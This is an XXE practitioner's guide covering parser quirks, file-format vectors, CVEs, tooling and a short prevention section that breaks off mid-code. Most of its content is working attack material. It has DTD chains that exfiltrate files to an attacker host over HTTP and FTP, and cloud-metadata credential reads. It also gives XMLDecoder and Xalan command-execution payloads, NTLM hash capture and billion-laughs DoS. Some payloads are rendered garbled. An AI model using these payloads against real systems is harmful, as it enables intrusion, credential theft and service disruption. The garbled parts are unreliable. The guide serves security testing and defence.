Comprehensive XXE Guide#
A practitioner’s reference for XML External Entity injection — fundamentals, parser quirks, in-band and out-of-band exfiltration, parameter entity chains, file-format vectors, real-world CVEs, tooling, and hardening. Compiled from 40 research sources.
Table of Contents#
- Fundamentals
- Attack Surface & Entry Points
- Classic In-Band XXE
- Blind XXE via External DTD
- Error-Based XXE
- Parameter Entities & Local DTD Chains
- XXE → SSRF Pivoting
- XXE → File Read & Information Disclosure
- XXE → RCE
- Parser-Specific Behaviors
- XML File-Format Vectors
- WAF & Filter Bypasses
- Denial of Service
- Real-World CVEs & Chains
- Tooling
- Detection & Prevention
- Payload Quick Reference
1. Fundamentals#
XXE (XML External Entity) injection occurs when an XML parser processes attacker-controlled input with DTD (Document Type Definition) and external entity resolution enabled. The parser treats SYSTEM identifiers as URIs, fetching and substituting their content into the document — yielding file read, SSRF, blind exfiltration, DoS, and in some stacks RCE.
Three classes:
| Class | Description | Example |
|---|---|---|
| In-Band | Entity value reflected directly in response | XML-to-JSON converters, stock-lookup APIs |
| Blind / OOB | No reflection — data exfiltrated via DNS/HTTP/FTP to attacker DTD | SVG/DOCX processors, async workers |
| Error-Based | Content leaked through parser exception messages | Spring Boot 500 handlers, lxml XMLSyntaxError |
Impact spectrum: DNS/HTTP callback → Arbitrary file read → Source code disclosure → Cloud metadata / IMDS token theft → Internal service enumeration → Credential capture (SMB hash) → Remote code execution (PHP expect, Java XMLDecoder, XSLT).
1.1 The XML DTD primer#
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ELEMENT root ANY>
<!ENTITY internal "literal value">
<!ENTITY external SYSTEM "file:///etc/passwd">
<!ENTITY % param SYSTEM "http://attacker/evil.dtd">
]>
<root>&external;</root>
<!DOCTYPE …>— declares the document type and internal subset.<!ELEMENT …>— declares allowed element structure (rarely required).<!ENTITY name "value">— general entity, referenced as&name;inside the document body.<!ENTITY name SYSTEM "URI">— external general entity, parser fetches the URI.<!ENTITY % name …>— parameter entity, referenced as%name;inside the DTD only. Cannot appear inside the document body.%name;inside the internal subset is the primitive behind blind and error-based XXE.
1.2 Entity reference rules that matter for exploitation#
- A general entity (
&x;) can only reference text, not otherSYSTEMidentifiers.<!ENTITY x SYSTEM "http://host/?q=&y;">is illegal. - Parameter entities (
%x;) can be used to concatenate text into other declarations — the basis of the “evil.dtd” trick. - You cannot reference a parameter entity from within the same internal subset declaration it’s defined in — hence external DTDs are used to host the indirection.
- Systems that blend internal + external DTDs allow redefinition of an entity originally declared externally — the key to local-DTD / error-based chains.
SYSTEMURIs may befile://,http://,https://,ftp://,gopher://,jar:,netdoc:,data:,php://…,expect://.
1.3 Why it’s still everywhere#
- XML is deep in legacy plumbing (SOAP, SAML, WS-Security, XMPP, RSS/Atom, Office Open XML, SVG, XLIFF, XMP, RDF, PDF metadata, Kubernetes API fallback, Android app processing).
- Many parsers still default to permissive DTD handling (libxml2 with
LIBXML_DTDLOAD | LIBXML_NOENT, Java SAX/DOM prior to JDK 13 hardening, .NET Framework 4.5.1 and earlier, old Nokogiri). - “JSON only” APIs often accept XML via
Content-Type: application/xmlortext/xmlas an undocumented fallback — valuable injection points. - File-format fuzzers routinely uncover XXE in image/document processors that unzip Office documents behind the scenes.
2. Attack Surface & Entry Points#
2.1 Request-level sinks#
| Category | Examples |
|---|---|
| XML request bodies | Content-Type: application/xml, text/xml, application/soap+xml, application/xliff+xml |
| JSON → XML conversion | APIs that accept both; toggle Content-Type: application/xml on a JSON endpoint |
| SOAP / WS- endpoints* | Legacy integrations, admin APIs, invoice/billing, enterprise middleware |
| SAML SSO | SAMLResponse, AuthnRequest, IdP metadata upload |
| RSS / Atom feeds | “Import feed”, link preview, social aggregators |
| File uploads | SVG avatars, DOCX/XLSX/PPTX importers, XMP images, EPUB, XLIFF, XFA PDF forms |
| XInclude points | Server-side XML templating where the DOCTYPE can’t be controlled but XML fragments can |
| Webhook/CI | XML build manifests, Maven POM, Gradle module metadata, .csproj, .xib, .storyboard |
| Printer/orchestration APIs | JMF (Job Messaging Format) on port 4004, XFDF, Xerox FreeFlow |
| SCADA / industrial | Batch job XML, OPC UA fallback, manufacturing execution systems |
2.2 Code-level sinks#
Java javax.xml.parsers.DocumentBuilderFactory / SAXParserFactory
javax.xml.transform.TransformerFactory
javax.xml.validation.SchemaFactory
javax.xml.stream.XMLInputFactory
javax.xml.xpath.XPathFactory
java.beans.XMLDecoder -- deserialization → RCE
org.jdom2.input.SAXBuilder
org.dom4j.io.SAXReader
.NET System.Xml.XmlDocument (with XmlUrlResolver)
System.Xml.XmlTextReader -- pre-4.5.2 defaults dangerous
System.Xml.XmlReader + XmlReaderSettings { DtdProcessing.Parse, XmlResolver = new XmlUrlResolver() }
System.Xml.XPath.XPathDocument
System.Xml.Linq.XDocument (pre-4.5.2)
System.Xml.Serialization.XmlSerializer
Python xml.etree.ElementTree -- safe by default for entities, still fetches DTDs via lxml
lxml.etree (libxml2) -- parameter-entity XXE until 5.4.0
xml.dom.minidom
xml.sax
xmltodict -- wraps expat
PHP libxml (SimpleXMLElement, DOMDocument, XMLReader)
-- LIBXML_NOENT enables entity substitution (dangerous)
Ruby Nokogiri -- DTDLOAD/NOENT opt-in required
REXML -- XML bomb protection, still resolves ENTITY
Node.js libxmljs, xml2js (with explicitArray/DOCTYPE allowed), xmldom, fast-xml-parser
Go encoding/xml -- does not resolve SYSTEM, generally safe
2.3 Content-Type smuggling#
If a POST endpoint accepts JSON, try swapping the body:
POST /api/order HTTP/1.1
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://collab/xxe">]>
<order><item>&x;</item></order>
Burp extension Content Type Converter automates the JSON→XML flip.
3. Classic In-Band XXE#
When the parser reflects the entity value in the HTTP response, file disclosure is one request:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&file;</productId>
<storeId>1</storeId>
</stockCheck>
When the parser rejects undeclared elements, add an ANY declaration:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT stockCheck ANY>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&file;</productId>
</stockCheck>
3.1 XInclude — DOCTYPE-less injection#
Useful when the server builds the outer XML and only lets you inject a small fragment (e.g. a productId field that is inlined into a SOAP envelope):
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
Requires an XInclude-aware parser. In Java: DocumentBuilderFactory.setXIncludeAware(true) or XOM/dom4j defaults.
3.2 Directory listing (Java file:// quirk)#
libxml2 and the Java file: URL handler list directory contents when the URI points at a folder:
<!DOCTYPE r [<!ENTITY dir SYSTEM "file:///etc/">]>
<r>&dir;</r>
Java returns a newline-separated listing; libxml2 returns a text rendering. Use for filesystem enumeration before switching to targeted reads.
4. Blind XXE via External DTD#
No reflection? Force the parser to fetch an attacker-hosted DTD and chain parameter entities.
4.1 Step 1 — prove external connectivity#
<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY % ping SYSTEM "http://collab.example/"> %ping;]>
<r/>
If the Burp Collaborator / interact.sh receives a hit, the parser resolves parameter entities and will fetch remote DTDs.
4.2 Step 2 — chain a parameter entity for OOB exfil#
Hosted at http://attacker/evil.dtd:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker/x?d=%file;'>">
%eval;
%exfil;
Victim payload:
<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY % xxe SYSTEM "http://attacker/evil.dtd"> %xxe;]>
<r/>
Flow: victim parser fetches evil.dtd → defines %file → %eval builds %exfil dynamically → %exfil makes an HTTP GET with the file contents in the query string.
4.3 FTP for multi-line files#
HTTP URL parsers strip newlines. For files like /etc/passwd use FTP, where the file contents ride as the password in the URI:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY % send SYSTEM 'ftp://a:%file;@attacker/x'>">
%all;
%send;
Pair with a dummy FTP listener (e.g. ONsec xxe-ftp-server.rb) that logs the PASS command without actually handshaking.
4.4 Gopher (legacy Java ≤ 1.7)#
<!ENTITY % send SYSTEM "gopher://attacker:1337/?%file;">
Effectively extinct in modern deployments but still useful on embedded Java or ancient appliances.
4.5 DNS-only exfiltration#
When only outbound DNS is allowed, encode one file-byte per subdomain via iterative XXE or use a tool like XXEinjector to chunk. For simple fingerprinting a bare DNS lookup is enough:
<!ENTITY % p SYSTEM "http://$(id).dns.attacker.tld/">
5. Error-Based XXE#
Used when OOB is blocked (egress filtered) but the app surfaces parser errors.
5.1 External-DTD error variant#
<!-- evil.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
The parser tries to open file:///nonexistent/<contents of /etc/passwd>, fails, and embeds the missing-path string in the exception thrown back to the client.
5.2 Purely local (no egress) — local DTD trick#
PortSwigger / Arseniy Sharoglazov’s technique: find a DTD that already exists on the server filesystem whose entities can be redefined from the internal subset.
Canonical example (GNOME yelp):
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
<r/>
%ISOamso; is redefined to inject additional declarations; when %local_dtd; is expanded the injected entities fire and produce the error.
Other high-hit local DTDs (see GoSecure dtd-finder for full list):
| Path | Overridable entity |
|---|---|
/usr/share/yelp/dtd/docbookx.dtd | ISOamso |
/usr/share/xml/fontconfig/fonts.dtd | constant |
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd | various |
/opt/IBM/WebSphere/AppServer/properties/schemas/j2ee/XMLSchema.dtd | WebSphere |
/usr/share/java/xalan2.jar!/org/apache/xalan/res/XSLTInfo.properties | Xalan |
C:\Windows\System32\wbem\xml\cim20.dtd | Windows |
Brute-force the DTD path with Intruder using the dtd_files.txt wordlist from the GoSecure repo.
5.3 GoSecure dtd-finder#
java -jar dtd-finder.jar /path/to/docker-image.tar
Scans a tarball/Docker image for DTDs and automatically identifies entities that can be overridden. Point at the target’s base image to build a custom payload list.
6. Parameter Entities & Local DTD Chains#
Understanding the parameter-entity gymnastics is essential because almost every advanced XXE variant boils down to:
- Define
%filethat reads the target. - Define
%evalthat — when expanded — declares a third entity whose URI concatenates%file’s value. - Expand
%eval, then expand the generated entity.
6.1 Character-reference encoding#
Because % and & inside the internal subset are parsed immediately, you must delay their evaluation. Use character references:
| Literal | Delayed form |
|---|---|
% | % |
& | & |
% (one more level) | &#x25; |
Rule of thumb: each layer of delayed expansion adds one more & wrap.
6.2 Double-encoded payload template#
<!ENTITY % outer '
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % wrap "<!ENTITY &#x25; leak SYSTEM 'http://a/?x=%file;'>">
%wrap;
%leak;
'>
%outer;
6.3 lxml “meow://” trick (libxml2 bypass of 5.4.0 hardening)#
lxml ≥ 5.4.0 blocked error-parameter entities, but general entities built from parameter entities still leak via a bogus scheme:
<!DOCTYPE colors [
<!ENTITY % a '
<!ENTITY % file SYSTEM "file:///tmp/flag.txt">
<!ENTITY % b "<!ENTITY c SYSTEM 'meow://%file;'>">
'>
%a; %b;
]>
<colors>&c;</colors>
The parser reports failed to load external entity "meow://FLAG{secret}" — flag in error message, no egress needed.
Fixed in lxml ≥ 5.4.0 and libxml2 ≥ 2.13.8. Either alone is not sufficient.
7. XXE → SSRF Pivoting#
Every XXE is an SSRF primitive. The http:// scheme inside a SYSTEM URI forces the server to issue an outbound request.
7.1 Cloud metadata exfil#
AWS (IMDSv1):
<!ENTITY aws SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
GCP:
<!ENTITY gcp SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">
Note: GCP IMDS requires Metadata-Flavor: Google header — XXE typically can’t set request headers, so GCP is usually a dead end unless the parser uses a custom HTTP client that forwards request headers.
Azure IMDS:
<!ENTITY az SYSTEM "http://169.254.169.254/metadata/instance?api-version=2021-02-01">
Azure also requires Metadata: true header — usually blocked, same caveat as GCP.
IMDSv2 on AWS requires a PUT to get a token — blocks naive XXE. If the backend still permits IMDSv1 via HttpTokens=optional, exploitation stays trivial.
7.2 Internal port scan / service enumeration#
Error/response timing differences reveal open vs closed ports:
<!ENTITY scan SYSTEM "http://10.0.0.5:6379/">
Redis/Memcached/Elasticsearch without auth can sometimes be driven via gopher smuggling, though XXE alone lacks CRLF control.
7.3 JMF / print orchestration (Xerox FreeFlow Core)#
Real case: a JMF listener on TCP/4004 parsed XML without hardening. A crafted JMF DOCTYPE with a SYSTEM entity caused the server to issue outbound HTTP, confirming SSRF. Chained with a subsequent path traversal, it led to unauthenticated RCE.
<?xml version="1.0"?>
<!DOCTYPE JMF [<!ENTITY probe SYSTEM "http://collab/oob">]>
<JMF SenderID="t" Version="1.3"><Query Type="KnownMessages">&probe;</Query></JMF>
8. XXE → File Read & Information Disclosure#
8.1 High-value target files (Linux)#
/etc/passwd /etc/shadow (rarely readable)
/etc/hosts /etc/resolv.conf
/proc/self/environ env vars, often contain secrets & tokens
/proc/self/cmdline full process command line
/proc/self/cwd/<file> relative-path access
/proc/self/net/tcp open sockets
/proc/self/status
/proc/version /etc/issue fingerprinting
/proc/1/maps memory mappings
/root/.ssh/id_rsa /root/.aws/credentials if root-run
/var/lib/kubelet/config.yaml
/run/secrets/kubernetes.io/serviceaccount/token
8.2 Windows#
C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\
C:\Windows\System32\inetsrv\config\applicationHost.config
file://attacker-smb-share/a.jpg → NetNTLMv2 hash capture via Responder
8.3 Binary & non-ASCII file read#
Raw file:// breaks on non-XML-safe bytes. Wrap in base64 via PHP filter:
<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">
Java: wrap the read inside a CDATA block via a two-stage entity construction (XXEinjector --cdata mode).
8.4 Source code recovery#
PHP filters cover the filesystem; combine with .git/config, .svn/wc.db, composer.json, framework configs to rebuild source trees.
9. XXE → RCE#
9.1 PHP expect:// wrapper#
If the expect extension is loaded:
<!DOCTYPE r [<!ENTITY x SYSTEM "expect://id">]>
<r>&x;</r>
Rare in the wild — pecl expect is almost never deployed — but still worth testing when PHP fingerprint is confirmed.
9.2 Java XMLDecoder deserialization#
java.beans.XMLDecoder.readObject() processes XML that instantiates arbitrary classes. If an app exposes it to user input, it’s instant RCE (not strictly XXE but frequently conflated because the entry point is XML).
<?xml version="1.0"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<array class="java.lang.String" length="3">
<void index="0"><string>/bin/sh</string></void>
<void index="1"><string>-c</string></void>
<void index="2"><string>id > /tmp/p</string></void>
</array>
</void>
</object>
</java>
Real CVE targets: Oracle WebLogic CVE-2017-10271, Restlet XMLDecoder endpoints.
9.3 XSLT → Java RCE via Xalan#
If you can control a stylesheet (or feed XSLT to a Transformer):
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
xmlns:str="http://xml.apache.org/xalan/java/java.lang.String">
<xsl:template match="/">
<xsl:variable name="cmd">touch /tmp/pwn</xsl:variable>
<xsl:variable name="rt" select="rt:getRuntime()"/>
<xsl:variable name="p" select="rt:exec($rt,$cmd)"/>
</xsl:template>
</xsl:stylesheet>
Default-enabled on Java’s Xalan until JDK 15 introduced jdk.xml.enableExtensionFunctions=false.
9.4 jar: protocol → file-write → RCE chain#
Java’s jar:http://… handler downloads a ZIP to /tmp/…, extracts it, reads a member, then deletes the archive. Hanging the HTTP server indefinitely keeps the temp file alive. Combined with a second vulnerability (LFI, template injection, deserialization, XSLT upload) this yields RCE.
<!ENTITY x SYSTEM "jar:http://attacker:8080/evil.zip!/marker.txt">
Workshop tooling: slow_http_server.py / slowserver.jar from GoSecure xxe-workshop.
9.5 NetNTLMv2 capture (Windows)#
<!ENTITY x SYSTEM "file:////attacker/share/a.jpg">
Point Responder.py -I eth0 at the listener, capture the NetNTLMv2 hash, crack with hashcat -m 5600.
10. Parser-Specific Behaviors#
10.1 libxml2 (PHP, Python lxml, Ruby Nokogiri, many C/C++ apps)#
- External entity resolution is off by default since 2.9.0 unless
LIBXML_NOENTorLIBXML_DTDLOADis set. - PHP’s
libxml_disable_entity_loader(true)was the historical fix (deprecated in PHP 8). - Parameter-entity expansion continued even with “safe” settings until 2.13.8.
- Directory listing via
file:///etc/supported.
10.2 Xerces (Java SAX/DOM)#
DocumentBuilderFactory/SAXParserFactorystill default to entity resolution enabled unless features explicitly disabled.- Hardening flags (all must be set):
http://apache.org/xml/features/disallow-doctype-decl→true(best defence)http://xml.org/sax/features/external-general-entities→falsehttp://xml.org/sax/features/external-parameter-entities→falsehttp://apache.org/xml/features/nonvalidating/load-external-dtd→falseFEATURE_SECURE_PROCESSING→truesetXIncludeAware(false);setExpandEntityReferences(false)
TransformerFactory,SchemaFactory,XPathFactory,Validator,SAXTransformerFactoryeach need independent hardening viaACCESS_EXTERNAL_DTD/ACCESS_EXTERNAL_STYLESHEET/ACCESS_EXTERNAL_SCHEMA.
10.3 .NET#
| API | Default (pre-4.5.2) | Default (4.5.2+) |
|---|---|---|
XmlDocument | XmlUrlResolver present — vulnerable | XmlResolver = null — safe |
XmlTextReader | ProhibitDtd = false — vulnerable | DtdProcessing = Prohibit — safe |
XmlReader (via XmlReader.Create) | DtdProcessing = Prohibit — safe | safe |
XPathDocument | dangerous | fixed |
XDocument / XElement | uses XmlReader internally — generally safe | safe |
Always dangerous regardless of version: setting XmlResolver = new XmlUrlResolver() or DtdProcessing = Parse with non-null resolver.
Look for these patterns in C# code review:
var rdr = new XmlTextReader(input);
rdr.XmlResolver = new XmlUrlResolver(); // BAD
rdr.DtdProcessing = DtdProcessing.Parse; // BAD
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Parse, // BAD
XmlResolver = new XmlUrlResolver(), // BAD
MaxCharactersFromEntities = 0 // enables unbounded billion-laughs
};
Real CVE: CVE-2025-27136 in the LocalS3 Java S3 emulator used a default DocumentBuilderFactory on the CreateBucketConfiguration endpoint, letting unauthenticated attackers read /etc/passwd.
10.4 Python lxml#
- Safe mode:
etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True). - Parameter-entity XXE viable before lxml 5.4.0 / libxml2 2.13.8, even with
resolve_entities=False, whenload_dtd=True. defusedxmlpackage monkey-patches stdlib/lxml to blockDOCTYPEentirely — recommended.
10.5 Nokogiri (Ruby)#
- Safe by default. Dangerous only when
DTDLOAD | NOENTpassed:Nokogiri::XML(input) { |c| c.dtdload.noent } # BAD REXML::Document— inherits from ruby-stdlib; patches since 2013 cap recursion but general entities still expand.
10.6 Go encoding/xml#
- Does not resolve SYSTEM entities. Historically considered safe.
- Custom decoders (
etree,html-xml-tools) can still be coaxed to fetch DTDs — review any third-party XML lib on Go.
11. XML File-Format Vectors#
Any file whose internals contain XML is an XXE delivery vehicle.
11.1 SVG (file upload)#
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg" width="300" height="200">
<text>&x;</text>
</svg>
Or <image xlink:href="file:///etc/hostname"/>. Works against ImageMagick (prior to policy.xml hardening), librsvg, Inkscape, Apache Batik, many cloud image processors.
11.2 Office Open XML (DOCX, XLSX, PPTX)#
unzip foo.docx -d foo/- Edit
foo/word/document.xml(orxl/workbook.xml) — insert<!DOCTYPE …>with payload between the XML prolog and the root element. cd foo && zip -r ../evil.docx .- Upload to the target’s document-processing feature (resume parsers, invoice ingest, doc-to-PDF).
11.3 XLIFF (translation files)#
Apache Tika, Okapi, XLIFF Toolbox. Example that worked against a Java 1.8 parser (see clipped article):
<?xml version="1.0"?>
<!DOCTYPE XXE [<!ENTITY % remote SYSTEM "http://attacker/evil.dtd"> %remote;]>
<xliff srcLang="en" trgLang="ms-MY" version="2.0"/>
11.4 PDF (XFA forms, XMP metadata)#
Acrobat XFA forms wrap XML; PDF metadata (/Metadata stream) carries an XMP packet. Many server-side PDF handlers (iText, PDFBox, Ghostscript) parse these.
11.5 EPUB, ODF#
EPUB is a ZIP containing XHTML + OPF XML. ODF (LibreOffice) is a ZIP of content.xml / styles.xml. Both have historical XXE CVEs in reader software.
11.6 SVG / MathML embedded in HTML#
If an HTML sanitizer passes SVG through unchanged and a later stage parses it with an XML parser, XXE is reachable even when the primary input is HTML.
11.7 SOAP envelopes#
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<foo><![CDATA[<!DOCTYPE d [<!ENTITY % r SYSTEM "http://a/e.dtd"> %r;]><d/>]]></foo>
</soap:Body>
</soap:Envelope>
CDATA wrapping sometimes bypasses outer sanitization.
11.8 SAML#
SAMLResponse XML is base64-encoded before transport — decode, inject DOCTYPE, re-encode. Signature validation may invalidate the payload unless the IdP-trust relationship allows a re-signed document; however many SPs parse the XML before signature verification (classic XSW-style bugs), making XXE trivially reachable.
11.9 RSS / Atom#
Feed-ingest services (Feedly-like, Slack preview bots, Hootsuite) routinely fetch user URLs and parse RSS. Host a poisoned feed and wait.
11.10 Android / iOS asset bundles#
Android manifest, .xib, .storyboard, .plist (XML variant) — XXE reached via supply-chain build tooling has produced numerous CI takeovers.
12. WAF & Filter Bypasses#
12.1 Encoding#
- UTF-7 / UTF-16: re-encode payload, declare
encoding="UTF-7"in the prolog. Many WAFs only inspect UTF-8. - HTML numeric entities inside the DTD to obscure the
DOCTYPE/ENTITYkeywords (the parser resolves them before interpreting). - Comment injection:
<!-- inside DTDs is not allowed, but CDATA and character refs are -->.
12.2 Scheme alternatives#
| Blocked | Alternative |
|---|---|
file:///etc/passwd | netdoc:///etc/passwd (Java) |
file:// | jar:file:/// |
http:// | https://, ftp://, gopher:// |
SYSTEM keyword filtered | PUBLIC "-//W3C//DTD..." "URI" — PUBLIC identifiers also trigger fetches |
12.3 data:// smuggling#
<!DOCTYPE r [<!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init;]><r/>
If the parser resolves data: URIs, the base64 inside decodes at parse time and effectively imports an arbitrary DTD payload past string-based filters.
12.4 Nested general-entity bypass via HTML entities#
From Ambrotd/XXE-Notes — obfuscate the inner ENTITY so regex filters on SYSTEM and % don’t match:
<!DOCTYPE foo [
<!ENTITY % a "<!ENTITY%dtdSYSTEM"http://a/e.dtd">">
%a;%dtd;
]>
<data><env>&exfil;</env></data>
12.5 WrapWrap / Lightyear PHP tricks#
Swarm’s “Impossible XXE in PHP” demonstrated chaining php://filter chains (convert.iconv.*) to bypass strict <?xml / <!DOCTYPE byte filters by generating the required bytes via iconv transformations inside the filter chain itself. Highly situational but lethal when the simpler bypasses fail.
13. Denial of Service#
13.1 Billion Laughs#
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>
9 levels = ~10⁹ expansions, gigabytes of memory.
13.2 Quadratic blowup#
One giant entity ("A" * 100000) referenced 10,000 times. Bypasses entityExpansionLimit in some parsers because it’s a single entity.
13.3 External resource DoS#
<!ENTITY x SYSTEM "http://slowloris.internal/never-closes">
<!ENTITY y SYSTEM "file:///dev/urandom">
<!ENTITY z SYSTEM "file:///dev/zero">
Each forces the server thread to hang — cheap resource exhaustion.
13.4 YAML variant (“Billion Lols” in YAML)#
YAML anchors/aliases have the same problem. Any parser that re-dereferences aliases recursively is vulnerable. Real case: Visual Studio 2022 consumed 100 GB of RAM on a crafted XAML file (XEE — XML Entity Expansion).
14. Real-World CVEs & Chains#
| CVE | Product | Notes |
|---|---|---|
| CVE-2014-3660 | libxml2 | Entity expansion amplification fix |
| CVE-2017-10271 | Oracle WebLogic | wls-wsat XMLDecoder → unauth RCE |
| CVE-2018-1000840 | Apache Batik | SVG xlink:href="file://" disclosure |
| CVE-2019-17571 | Apache log4j 1.2 SocketServer | XML deserialization |
| CVE-2020-5245 | dropwizard-validation | XXE via Jersey XmlProvider |
| CVE-2021-33813 | JDOM | SAXBuilder external DTD |
| CVE-2021-34429 | Eclipse Jetty | XML file list through XInclude |
| CVE-2022-1471 | SnakeYAML (XEE cousin) | tag-based RCE via typed deserialisation |
| CVE-2023-34034 | Spring Security | SAML XXE pre-signature |
| CVE-2024-22257 | Spring Security | SAML signature XXE |
| CVE-2025-27136 | LocalS3 (Java S3 emulator) | DocumentBuilderFactory default → unauth file read on CreateBucketConfiguration |
| CVE-2025-49493 | Akamai CloudTest | XXE in test-case import allowing file read |
| CVE-2025-68493 | Apache Struts | XXE in action XML configuration parsing |
| CVE-2026-29924 | Grav CMS ≤ 1.7.x | Admin-panel SVG upload → authenticated XXE, file read + SSRF |
| Cisco ISE | Identity Services Engine | XXE in external-identity integration XML |
| Xerox FreeFlow Core | JMF listener on :4004 | DOCTYPE allowed → unauth SSRF + path traversal → RCE |
| Horizon3 “Support Ticket to 0-day” | FreeFlow Core | Full exploit chain write-up: XXE → SSRF → path traversal → RCE |
14.1 Honoki — blind XXE to root file read#
Creative chain: OOB XXE used to enumerate /proc/self/environ, leaked a service credential, which unlocked a privileged endpoint that returned the filesystem root. Illustrates that initial “boring” file read often unlocks higher-privilege primitives.
14.2 Bugcrowd / H1 patterns#
Recurring paid reports:
- SVG avatar → XXE file read on Rails / Node image processors.
- DOCX import → blind OOB XXE on HR/ATS platforms.
- SAML metadata upload → admin-role XXE on Okta-competitor SSO.
- XLSX bulk-import → XXE reading
/proc/self/environ→ DB credential disclosure.
15. Tooling#
15.1 XXEinjector (Ruby)#
Automates direct + OOB exploitation. Highlights:
- OOB methods: FTP (default), HTTP, gopher (Java ≤ 1.7).
- Directory enumeration (Java) or file brute-forcing (any).
- Second-order: sends the XXE in one request, reads it back from a second.
--phpfilterauto-wraps reads inphp://filter/convert.base64-encode.--hashestriggers SMB to steal NetNTLMv2.--expectuses PHP expect wrapper for RCE.--uploadusesjar:to drop files in temp dir.--xslttests for XSLT injection.
ruby XXEinjector.rb --host=10.0.0.2 --path=/etc --file=req.txt --oob=http
ruby XXEinjector.rb --host=10.0.0.2 --file=req.txt --phpfilter --brute=files.txt
ruby XXEinjector.rb --host=10.0.0.2 --file=req.txt --hashes
15.2 XXExploiter (Node/TS — luisfontes19)#
Generates payloads and serves the companion HTTP/FTP infrastructure in one go. Useful when you don’t want to stand up separate listeners.
15.3 BuffaloWill/oxml_xxe#
Embeds XXE payloads into DOCX/XLSX/SVG/GPX/XMP/EPUB/IDML/PDF/HWP wrappers automatically. One-click for file-format vectors.
15.4 GoSecure dtd-finder#
java -jar dtd-finder.jar target-image.tar
Scans Docker images / tarballs for DTD files and identifies overridable entities — indispensable for error-based local-DTD attacks.
15.5 defusedxml (Python)#
Defensive. Monkey-patches xml.etree, lxml, xml.sax, xmlrpc to forbid DOCTYPE, external entities, and entity-expansion bombs. Use in any Python codebase handling untrusted XML.
15.6 Burp Suite extensions#
- Content Type Converter — flip JSON requests to XML/YAML.
- HackVertor — tag-based encoding for rapid payload mutation.
- XXE-Hunter — auto-detect XXE in requests with XML bodies.
- Reissue Request Scripter — build Python scripts for iterative XXE file reads.
- Burp Collaborator — essential OOB endpoint.
15.7 OOB infrastructure#
- Burp Collaborator (paid).
interact.sh/interactsh-clientfrom ProjectDiscovery (free).canarytokens.orgfor one-shot DNS tokens.- Dummy FTP for password-channel exfil: ONsec
xxe-ftp-server.rb. slow_http_server.py/slowserver.jarforjar:chain abuse.
16. Detection & Prevention#
16.1 Static analysis patterns#
Search for any XML parser instantiation not accompanied by hardening flags:
Java DocumentBuilderFactory.newInstance() # without setFeature hardening
SAXParserFactory.newInstance()
TransformerFactory.newInstance()
SchemaFactory.newInstance()
XMLInputFactory.newFactory()
SAXReader # dom4j
SAXBuilder # jdom2
java.beans.XMLDecoder # RCE risk
.NET new XmlDocument() # check .XmlResolver assignments
new XmlTextReader(...) # check .DtdProcessing & .XmlResolver
new XmlReaderSettings { DtdProcessing = DtdProcessing.Parse }
XmlSerializer.Deserialize(stream)
Python lxml.etree.XMLParser(load_dtd=True)
lxml.etree.XMLParser(resolve_entities=True)
xml.sax.make_parser() # use defusedxml instead
xml.dom.pulldom / xml.etree # inspect parser flags
PHP simplexml_load_string($x, null, LIBXML_NOENT | LIBXML_DTDLOAD)
DOMDocument::loadXML($x, LIBXML_NOENT)
libxml_disable_entity_loader(false) # explicit re-enable
Ruby Nokogiri::XML(input) { |c| c.noent.dtdload }
REXML::Document.new(input)
Node new xmldom.DOMParser() # check for entityExpansionLimit
xml2js.parseString(..., { explicitCharkey: true })
16.2 Secure-by-default recipes#
Java:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
